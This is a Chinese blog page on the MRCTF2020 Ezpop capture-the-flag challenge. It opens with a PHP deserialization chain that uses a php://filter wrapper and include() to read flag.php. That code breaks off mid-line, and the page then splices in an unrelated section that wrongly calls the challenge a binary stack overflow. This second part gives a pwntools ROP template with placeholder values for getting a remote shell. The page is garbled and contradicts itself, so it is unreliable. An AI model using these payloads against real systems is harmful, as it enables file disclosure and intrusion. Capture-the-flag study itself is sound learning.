[MRCTF2020]Ezpop1

打卡题目

代码审计

果我们把modifiy对象的var改为php伪协议,然后成功调用invoke魔术方法就可以读出flag

调用invoke魔术方法需要将对象当做一个函数来使用,这样invoke方法就会自动调用

<?php
 
class Modifier {
    protected  $var = "php://filter/read=convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        echo "__invoke";
        $this->append($this->var);
    }
}
 
class Show{
    public $source;
    public $str;
    public f

### mrctf2020 ezpop CTF Challenge Walkthrough #### Problem Description mrctf2020 ezpop 是一个涉及利用栈溢出漏洞来执行任意代码的CTF挑战。该挑战提供了一个二进制文件,参与者需要找到并利用其中的安全漏洞。 #### Vulnerability Analysis 通过对提供的二进制文件 `ezpop` 进行逆向工程分析,发现程序存在栈缓冲区溢出的风险。具体来说,在处理用户输入时未对长度进行适当验证,这使得攻击者可以通过精心构造的数据覆盖返回地址,从而控制EIP寄存器指向恶意shellcode的位置[^1]。 #### Exploitation Steps 为了成功利用此漏洞,可以采取如下方法: - **确定偏移量**:使用pattern_create工具生成唯一字符串填充缓冲区直到覆盖到保存的EBP和EIP位置;再用pattern_offset定位实际发生覆写的地方。 - **寻找合适的gadget链**:由于目标机器上可能存在不可控因素影响直接注入shellcode的方式,因此考虑采用ROP(Return-Oriented Programming)技术构建payload。通过查找可用的小工具(gadgets),形成能够调用system("/bin/sh")功能的一系列指令序列。 - **绕过NX保护机制**:现代操作系统通常会启用DEP(Data Execution Prevention),即不允许数据页面被执行。此时可借助已泄露的信息泄漏函数指针或其他手段获取libc基址,进而计算得到/bin/sh字符串以及system()函数的确切内存地址。 ```python from pwn import * # 设置远程连接参数 host = 'challenge.ctf.games' port = 31875 # 创建进程对象并与服务端建立TCP连接 conn = remote(host, port) # 发送Payload前先接收初始提示信息 print(conn.recvuntil(b'> ').decode()) # 构造最终载荷 offset = cyclic_find(0x6161616a) # 替换为你自己的偏移值 padding = b'A' * offset ret_address = p32(0xdeadbeef) # 替换成正确的目标地址 rop_chain = ... # 填入ROP chain的具体实现细节 payload = padding + ret_address + rop_chain # 向服务器发送构造好的Payload conn.sendline(payload) # 切换交互模式等待命令执行结果 conn.interactive() ``` 上述Python脚本展示了如何自动化地与远程服务器通信并向其提交特制的有效负载以触发漏洞并获得shell访问权限[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值